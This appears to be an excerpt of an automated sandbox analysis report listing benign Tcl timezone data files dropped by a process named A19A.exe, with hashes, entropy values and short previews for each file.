                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Urumqi)]} {. LoadTimeZoneFile Asia/Urumqi.}.set TZData(:Asia/Kashgar) $TZData(:Asia/Urumqi).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):178
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8475287330512495
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52WFKXIi7mFSXGm2OHF+VT5vUQKwMTXvv6QzFrRk8P4VvWVQC:SlSWB9X52wKYgyJm2OH0T5RNMzvSQhR5
                                                                                                                                                                                                                                                                                                                                MD5:FEFB0E2021110BC9175AC505536BDE12
                                                                                                                                                                                                                                                                                                                                SHA1:8366110D91C7EA929DB300871DDC70808D458F90
                                                                                                                                                                                                                                                                                                                                SHA-256:C4E46CE4385C676F5D7AC4B123C42F153F7B3F3E9F434698E8D56E1907A9B7C9
                                                                                                                                                                                                                                                                                                                                SHA-512:F8F9EE0B8648154B3E3BEF192C58F2415475422BED139F20FD3D3EF253E8137CBB39AB769704AB1F20EE03B398402BC5B4A3E55BE284D1785F347B951FECEF62
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kathmandu) {. {-9223372036854775808 20476 0 LMT}. {-1577943676 19800 0 +0530}. {504901800 20700 0 +0545}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.786408960928606
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8yIi7VyVAIgN1AIilHt2WFKSiZ1/2WFKXIi7v:SlSWB9IZaM3y7gVyVAIg5M2wKSg1/2wm
                                                                                                                                                                                                                                                                                                                                MD5:A30FEA461B22B2CB3A67A616E3AE08FD
                                                                                                                                                                                                                                                                                                                                SHA1:F368B215E15F6F518AEBC92289EE703DCAE849A1
                                                                                                                                                                                                                                                                                                                                SHA-256:1E2A1569FE432CDA75C64FA55E24CA6F938C1C72C15FBB280D5B04F6C5E9AD69
                                                                                                                                                                                                                                                                                                                                SHA-512:4F3D0681791C23EF19AFF239D2932D2CE1C991406F6DC8E313C083B5E03D806D26337ED2477700596D9A9F4FB1B7FC4A551F897A2A88CB7253CC7F863E586F03
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Kathmandu)]} {. LoadTimeZoneFile Asia/Kathmandu.}.set TZData(:Asia/Katmandu) $TZData(:Asia/Kathmandu).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2046
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6162520408317844
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQNobe1I6oziDpiKXtyiyzilUBinUijiRziiiaSiYzYWk2HgQiMhNIziPiRikiA/:5NoV9InX4n7m84nPIzOtVEChbmAPD6
                                                                                                                                                                                                                                                                                                                                MD5:0AB1CB51373021D2929AD3BB6A6A7B36
                                                                                                                                                                                                                                                                                                                                SHA1:6A58A13DE2479D7C07DA574A2850DB5479F42106
                                                                                                                                                                                                                                                                                                                                SHA-256:7C282AFCBC654495AD174C5679C0FDA9C65DED557389648F924E809E337DF6A5
                                                                                                                                                                                                                                                                                                                                SHA-512:E865073DF7273319ADE90C0520D843C636679ACFF1FEEC4C62B85AB7458393A71EAAE32F507D90863BE4018212B497E41EFC7EA684DF821A0D4FF1A9895FDCD8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Khandyga) {. {-9223372036854775808 32533 0 LMT}. {-1579424533 28800 0 +08}. {-1247558400 32400 0 +10}. {354898800 36000 1 +10}. {370706400 32400 0 +09}. {386434800 36000 1 +10}. {402242400 32400 0 +09}. {417970800 36000 1 +10}. {433778400 32400 0 +09}. {449593200 36000 1 +10}. {465325200 32400 0 +09}. {481050000 36000 1 +10}. {496774800 32400 0 +09}. {512499600 36000 1 +10}. {528224400 32400 0 +09}. {543949200 36000 1 +10}. {559674000 32400 0 +09}. {575398800 36000 1 +10}. {591123600 32400 0 +09}. {606848400 36000 1 +10}. {622573200 32400 0 +09}. {638298000 36000 1 +10}. {654627600 32400 0 +09}. {670352400 28800 0 +09}. {670356000 32400 1 +09}. {686080800 28800 0 +08}. {695757600 32400 0 +10}. {701802000 36000 1 +10}. {717526800 32400 0 +09}. {733251600 36000 1 +10}. {748976400 32400 0 +09}. {764701200 36000 1 +10}. {780426000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.554598325373998
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52wKvCm2OHEX3gYLXdUvvVQLpUFGZjSVVFJGTNsR/tckVVFJGTL/FG/+d:MBp523CmdHNYjWXVQtUEZjAJGJs55vJg
                                                                                                                                                                                                                                                                                                                                MD5:FABB53074E1D767952C664BBA02E8975
                                                                                                                                                                                                                                                                                                                                SHA1:36D2D438FEEBF585D7A0B546647C08B63A582EA1
                                                                                                                                                                                                                                                                                                                                SHA-256:DAB02F68D5EEA0DAC6A2BBB7D12930E1B4DA62EBAEC7DE35C0AA55F72CCFF139
                                                                                                                                                                                                                                                                                                                                SHA-512:E178779CE31F8D16DFEC5F71F228BCB05FDA1939B1BCE204C40B14904682283BDC99F27B662E3995EEEE607D0E8C70BE3CE3DF6EAD355399566CF360D5EC9E70
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kolkata) {. {-9223372036854775808 21208 0 LMT}. {-3645237208 21200 0 HMT}. {-3155694800 19270 0 MMT}. {-2019705670 19800 0 IST}. {-891581400 23400 1 +0630}. {-872058600 19800 0 IST}. {-862637400 23400 1 +0630}. {-764145000 19800 0 IST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1991
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6170298534050245
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5Mi17A9/IJ4vQayW+dRvV8YzXJIq79Af3AuyqM7FfiC/LIcy9zU9Muq2PIX/9sC/:hjFRRCfQucXsNN0On
                                                                                                                                                                                                                                                                                                                                MD5:83333A0E3E9810621A8BADA29B04F256
                                                                                                                                                                                                                                                                                                                                SHA1:CDC375C93E7F3019562DE7CE1D9EE2776FE7FE9E
                                                                                                                                                                                                                                                                                                                                SHA-256:00A9E8DDDC4314F7271F7490001ABD29B6F5EAEB9080645911FF5DA8BD7F671C
                                                                                                                                                                                                                                                                                                                                SHA-512:08913E002C7D3D54F0E09029C70A0F2D18636F6F52B12F10593BECF732F40E180780D4C6127E0A3B321EAF54AF660A48E8C3E29A161B6ED6E0E46C06BBD309D6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Krasnoyarsk) {. {-9223372036854775808 22286 0 LMT}. {-1577513486 21600 0 +06}. {-1247551200 25200 0 +08}. {354906000 28800 1 +08}. {370713600 25200 0 +07}. {386442000 28800 1 +08}. {402249600 25200 0 +07}. {417978000 28800 1 +08}. {433785600 25200 0 +07}. {449600400 28800 1 +08}. {465332400 25200 0 +07}. {481057200 28800 1 +08}. {496782000 25200 0 +07}. {512506800 28800 1 +08}. {528231600 25200 0 +07}. {543956400 28800 1 +08}. {559681200 25200 0 +07}. {575406000 28800 1 +08}. {591130800 25200 0 +07}. {606855600 28800 1 +08}. {622580400 25200 0 +07}. {638305200 28800 1 +08}. {654634800 25200 0 +07}. {670359600 21600 0 +07}. {670363200 25200 1 +07}. {686088000 21600 0 +06}. {695764800 25200 0 +08}. {701809200 28800 1 +08}. {717534000 25200 0 +07}. {733258800 28800 1 +08}. {748983600 25200 0 +07}. {764708400 28800 1 +08}. {7804332
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):362
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.404454529095857
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52wK1NLm2OHrPmdXiWOb/MVSYv/1MesF5X8dSMd0dMVSSm8kvScCvCIMY:MBp52PLmdHrPdDTMF/wFZMxcHClMxi
                                                                                                                                                                                                                                                                                                                                MD5:B5FC8D431304F5C1ADF7D0B237DA5A52
                                                                                                                                                                                                                                                                                                                                SHA1:79FC3057CD88E4DF71421AD52C34E0127FBD6FDA
                                                                                                                                                                                                                                                                                                                                SHA-256:138912D754FBA8A1306063CCE897218972A4B0976EDDEC5C8E69A7965B0CD198
                                                                                                                                                                                                                                                                                                                                SHA-512:27DC64B43958814E1A935D817CCFE7ADE8E6E6A778E27E391683FC491764EB77774A3D4A871C4E83BBA43FF8BA2383CBB8CC2D4F1FEB1AE063735C95651865E9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kuala_Lumpur) {. {-9223372036854775808 24406 0 LMT}. {-2177477206 24925 0 SMT}. {-2038200925 25200 0 +07}. {-1167634800 26400 1 +0720}. {-1073028000 26400 0 +0720}. {-894180000 27000 0 +0730}. {-879665400 32400 0 +09}. {-767005200 27000 0 +0730}. {378664200 28800 0 +08}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):646
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.99554344665026
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp52HLKmdHXXUBMxoWFMcDBMxkT9r5N2Xhf7JSX3lzHC3:cQHLKeHUzaMcDBkkN5N2XV7Ja3hi3
                                                                                                                                                                                                                                                                                                                                MD5:2F27D1377C9EBBACDC260A50C195BDBB
                                                                                                                                                                                                                                                                                                                                SHA1:397B8714F2C909A8EB88A7A1F4A1AEA0A5B8E80E
                                                                                                                                                                                                                                                                                                                                SHA-256:519FDD455107270E6F8F3848C214D3D44CC1465B7B3E375318857D4A9093E1C0
                                                                                                                                                                                                                                                                                                                                SHA-512:E4583E6C3FEB5ADAD41827D8ADCD7DA34CCB92D2B62B9D7C3D59F76719B9EE2FE44697CFD00943D9E2A4DBAEB929C97A1FF520FFF62EB6829C88D71EC8C51993
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kuching) {. {-9223372036854775808 26480 0 LMT}. {-1383463280 27000 0 +0730}. {-1167636600 28800 0 +08}. {-1082448000 30000 1 +08}. {-1074586800 28800 0 +08}. {-1050825600 30000 1 +08}. {-1042964400 28800 0 +08}. {-1019289600 30000 1 +08}. {-1011428400 28800 0 +08}. {-987753600 30000 1 +08}. {-979892400 28800 0 +08}. {-956217600 30000 1 +08}. {-948356400 28800 0 +08}. {-924595200 30000 1 +08}. {-916734000 28800 0 +08}. {-893059200 30000 1 +08}. {-885198000 28800 0 +08}. {-879667200 32400 0 +09}. {-767005200 28800 0 +08}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):168
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.82804794783422
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8t1zVAIgNsM1E2WFKdQWFK81S:SlSWB9IZaM3yN1zVAIgaM1E2wKdQwK8c
                                                                                                                                                                                                                                                                                                                                MD5:6D6109F6EC1E12881C60EC44AAEB772B
                                                                                                                                                                                                                                                                                                                                SHA1:B5531BEAC1C07DA57A901D0A48F4E1AC03F07467
                                                                                                                                                                                                                                                                                                                                SHA-256:67BB9F159C752C744AC6AB26BBC0688CF4FA94C58C23B2B49B871CAA8774FC5D
                                                                                                                                                                                                                                                                                                                                SHA-512:B0624B9F936E5C1392B7EBB3190D7E97EAE96647AB965BB9BE045D2C3082B1C7E48FF89A7B57FD3475D018574E7294D45B068C555A43AAEDFD65AC5C5C5D0A5B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Riyadh)]} {. LoadTimeZoneFile Asia/Riyadh.}.set TZData(:Asia/Kuwait) $TZData(:Asia/Riyadh).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):164
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.729350272507574
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8PpVAIgNz5YF2WFKf+WFKjn:SlSWB9IZaM3yxVAIgLYF2wKGwKjn
                                                                                                                                                                                                                                                                                                                                MD5:DB6155900D4556EE7B3089860AD5C4E3
                                                                                                                                                                                                                                                                                                                                SHA1:708E4AE427C8BAF589509F4330C389EE55C1D514
                                                                                                                                                                                                                                                                                                                                SHA-256:8264648CF1EA3E352E13482DE2ACE70B97FD37FBB1F28F70011561CFCBF533EA
                                                                                                                                                                                                                                                                                                                                SHA-512:941D52208FABB634BABCD602CD468F2235199813F4C1C5AB82A453E8C4CE4543C1CE3CBDB9D035DB039CFFDBC94D5D0F9D29363442E2458426BDD52ECDF7C3C5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Macau)]} {. LoadTimeZoneFile Asia/Macau.}.set TZData(:Asia/Macao) $TZData(:Asia/Macau).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2141
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8815104664173843
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5o89px1D/MG/B/j/gf/d/iM/MW/C/2/Y/yf/9/y/l/v1EG/vFw/veE/K/Z/D/U/h:/p7DD5L2lRkWqOA6fVKdXqGXFwXeECRK
                                                                                                                                                                                                                                                                                                                                MD5:DC20959BDB02CF86A33CE2C82D4D9853
                                                                                                                                                                                                                                                                                                                                SHA1:90FC1820FA0E3B1C4BD2158185F95DCD1AA271D6
                                                                                                                                                                                                                                                                                                                                SHA-256:6263F011537DB5CAF6B09F16D55DADE527A475AEE04F1BA38A75D13E9D125355
                                                                                                                                                                                                                                                                                                                                SHA-512:8C6D0FA9584595B93A563D60387520CE9B28595C2C3880004275BAE66313A7606379646D27FB5EB91EC8D96D3B23959E2F9E3ABC97C203FD76E1DCC5ABB64374
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Macau) {. {-9223372036854775808 27250 0 LMT}. {-2056692850 28800 0 CST}. {-884509200 32400 0 +09}. {-873280800 36000 1 +09}. {-855918000 32400 0 +09}. {-841744800 36000 1 +09}. {-828529200 32400 0 +10}. {-765363600 28800 0 CT}. {-747046800 32400 1 CDT}. {-733827600 28800 0 CST}. {-716461200 32400 1 CDT}. {-697021200 28800 0 CST}. {-683715600 32400 1 CDT}. {-667990800 28800 0 CST}. {-654771600 32400 1 CDT}. {-636627600 28800 0 CST}. {-623322000 32400 1 CDT}. {-605178000 28800 0 CST}. {-591872400 32400 1 CDT}. {-573642000 28800 0 CST}. {-559818000 32400 1 CDT}. {-541674000 28800 0 CST}. {-528368400 32400 1 CDT}. {-510224400 28800 0 CST}. {-498128400 32400 1 CDT}. {-478774800 28800 0 CST}. {-466678800 32400 1 CDT}. {-446720400 28800 0 CST}. {-435229200 32400 1 CDT}. {-415258200 28800 0 CST}. {-403158600 32400 1 CDT}. {-383808600 2880
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2016
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6746770806664517
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQmecGdvBOCdwdVdptQvMCTP2rF1gCzlODU9xE305r/CXVWWHs/gSNkna:5tvBHwRw/P2rFGAlODU9PZUEWQgmka
                                                                                                                                                                                                                                                                                                                                MD5:18E80309362762B7757629B51F28AF99
                                                                                                                                                                                                                                                                                                                                SHA1:502C70F24251BC062785A9349E6204CB719BF932
                                                                                                                                                                                                                                                                                                                                SHA-256:6493D629E3CD4DB555A547F942BCCB4FFC7BBF7298FFBF9503F6DE3177ADBAC9
                                                                                                                                                                                                                                                                                                                                SHA-512:C477E0DCF4E78E57E075FB5CAA45E70D4864EDFC40EAC2DD43D80F71408836E5BD468B15EB34B95020F2DB6CE531D67F076EF8EED4833ADEC1F6D37B2200CC84
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Magadan) {. {-9223372036854775808 36192 0 LMT}. {-1441188192 36000 0 +10}. {-1247565600 39600 0 +12}. {354891600 43200 1 +12}. {370699200 39600 0 +11}. {386427600 43200 1 +12}. {402235200 39600 0 +11}. {417963600 43200 1 +12}. {433771200 39600 0 +11}. {449586000 43200 1 +12}. {465318000 39600 0 +11}. {481042800 43200 1 +12}. {496767600 39600 0 +11}. {512492400 43200 1 +12}. {528217200 39600 0 +11}. {543942000 43200 1 +12}. {559666800 39600 0 +11}. {575391600 43200 1 +12}. {591116400 39600 0 +11}. {606841200 43200 1 +12}. {622566000 39600 0 +11}. {638290800 43200 1 +12}. {654620400 39600 0 +11}. {670345200 36000 0 +11}. {670348800 39600 1 +11}. {686073600 36000 0 +10}. {695750400 39600 0 +12}. {701794800 43200 1 +12}. {717519600 39600 0 +11}. {733244400 43200 1 +12}. {748969200 39600 0 +11}. {764694000 43200 1 +12}. {780418800 3
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):234
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.682322181661182
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52wKCm2OHUVRYQTLQTvUfkc3gEkNHkH8vScCxWv:MBp526mdHsrTD8cQJl7HCMv
                                                                                                                                                                                                                                                                                                                                MD5:87D843314195847B6E4117119A1F701C
                                                                                                                                                                                                                                                                                                                                SHA1:E51DC3A0BF20B09D8745AC682B4869A031A0A515
                                                                                                                                                                                                                                                                                                                                SHA-256:22046165D40C8A553FE22A28E127514DF469E79581E0746101816A973456029D
                                                                                                                                                                                                                                                                                                                                SHA-512:D241803442876A59170C1A90ACC66DEAF169CBF9B8CD7DE964BEF02D222B1D07511E241D441C3DA6AE7A7D1AAC1F4EDB5A21655C2923A3807BBFA8630071BCE9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Makassar) {. {-9223372036854775808 28656 0 LMT}. {-1577951856 28656 0 MMT}. {-1172908656 28800 0 +08}. {-880272000 32400 0 +09}. {-766054800 28800 0 WITA}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):406
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4205762929520755
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp52G4JmdHnzZBPE6JwucQzX4rjJbmJtKn:cQG4Je11RbXzXqQ+
                                                                                                                                                                                                                                                                                                                                MD5:3A833BF91AFE7FABBA98D11F29D84EAA
                                                                                                                                                                                                                                                                                                                                SHA1:1622BEF54A12DE163B77309A0B7AF1C38AA6324B
                                                                                                                                                                                                                                                                                                                                SHA-256:665E07B7A01E8A9D04B76B74B2EA0D11BDFC0BE6CA855DFDDBB5F9A6C9A97E90
                                                                                                                                                                                                                                                                                                                                SHA-512:DFABB558CE2A8B96A976DD3B45B78CECE3633D51EE67F24E5AD59C7CF388538C5560EC133C60C3F0AFE8C68D88B1C05A12608A0408ACECBEEC38A84E3DC972FC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Manila) {. {-9223372036854775808 -57360 0 LMT}. {-3944621040 29040 0 LMT}. {-2229321840 28800 0 PST}. {-1046678400 32400 1 PDT}. {-1038733200 28800 0 PST}. {-873273600 32400 0 JST}. {-794221200 28800 0 PST}. {-496224000 32400 1 PDT}. {-489315600 28800 0 PST}. {259344000 32400 1 PDT}. {275151600 28800 0 PST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):165
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.754394427749078
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8DhVAIgN6Sn62WFKvE+H+WFKQo:SlSWB9IZaM3yjhVAIgMS62wKLewKQo
                                                                                                                                                                                                                                                                                                                                MD5:5D8EBBC297A2258C352BC80535B7F7F1
                                                                                                                                                                                                                                                                                                                                SHA1:684CAF480AF5B8A98D9AD1A1ECD4E07434F36875
                                                                                                                                                                                                                                                                                                                                SHA-256:4709F2DA036EB96FB7B6CC40859BF59F1146FE8D3A7AFE326FBA3B8CB68049CE
                                                                                                                                                                                                                                                                                                                                SHA-512:FD67E920D3D5FE69AF35535A8BBD2791204C6B63050EFECC0857F24D393712C4BC4660EA0A350D2A4DDA144073413BE013D71D73E6F3638CA30480541F9731FA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Dubai)]} {. LoadTimeZoneFile Asia/Dubai.}.set TZData(:Asia/Muscat) $TZData(:Asia/Dubai).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7368
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.620699686510499
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:EPByq7VKviW/naKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEA:EPFi//uh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                                                                                                MD5:21EEEC6314C94D1476C2E79BBACFEB77
                                                                                                                                                                                                                                                                                                                                SHA1:2C9805CD01C84D446CBDB90B9542CB24CCDE4E39
                                                                                                                                                                                                                                                                                                                                SHA-256:7AAB1AC67D96287EE468608506868707B28FCD27A8F53128621801DCF0122162
                                                                                                                                                                                                                                                                                                                                SHA-512:D4B0A0E60B102E10E03CF5BD07C5783E908D5E7079B646177C57C30D67B44C114EFF4DCFC71AF8441D67BD5A351068FBFFD8C5E08F06F1D69946B3EA7D49FC2D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Nicosia) {. {-9223372036854775808 8008 0 LMT}. {-1518920008 7200 0 EET}. {166572000 10800 1 EEST}. {182293200 7200 0 EET}. {200959200 10800 1 EEST}. {213829200 7200 0 EET}. {228866400 10800 1 EEST}. {243982800 7200 0 EET}. {260316000 10800 1 EEST}. {276123600 7200 0 EET}. {291765600 10800 1 EEST}. {307486800 7200 0 EET}. {323820000 10800 1 EEST}. {338936400 7200 0 EET}. {354664800 10800 1 EEST}. {370386000 7200 0 EET}. {386114400 10800 1 EEST}. {401835600 7200 0 EET}. {417564000 10800 1 EEST}. {433285200 7200 0 EET}. {449013600 10800 1 EEST}. {465339600 7200 0 EET}. {481068000 10800 1 EEST}. {496789200 7200 0 EET}. {512517600 10800 1 EEST}. {528238800 7200 0 EET}. {543967200 10800 1 EEST}. {559688400 7200 0 EET}. {575416800 10800 1 EEST}. {591138000 7200 0 EET}. {606866400 10800 1 EEST}. {622587600 7200 0 EET}. {638316000 10800
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1992
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.626746433557725
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5qi17A9/IJ4vQayW+dRvV8YzXJIq79Af3AuyqM7FfiC/LIcy9zU9Muq2PIX/9sCP:bjFRRCfQucXsNN0OX
                                                                                                                                                                                                                                                                                                                                MD5:11B80F2A9B7B090DD146BD97E9DB7D43
                                                                                                                                                                                                                                                                                                                                SHA1:4A2886799A50D031D79C935261B50363AA27768A
                                                                                                                                                                                                                                                                                                                                SHA-256:4018CE273BC4D02057F66A4715626F0E4D8C7050391C00BB5AE054B4DA8DE2F8
                                                                                                                                                                                                                                                                                                                                SHA-512:1F1650C1DBC3A171FF30C7657D7F99963A0C8D63B85460B45DE75AFABECE28F2A51236FB71DFF3EE567CC58E71B88623E4880DEBD18E9E9C9E527CF97D5FE926
                                                                                                                                                                                                                                                                                                                                Malicious:false
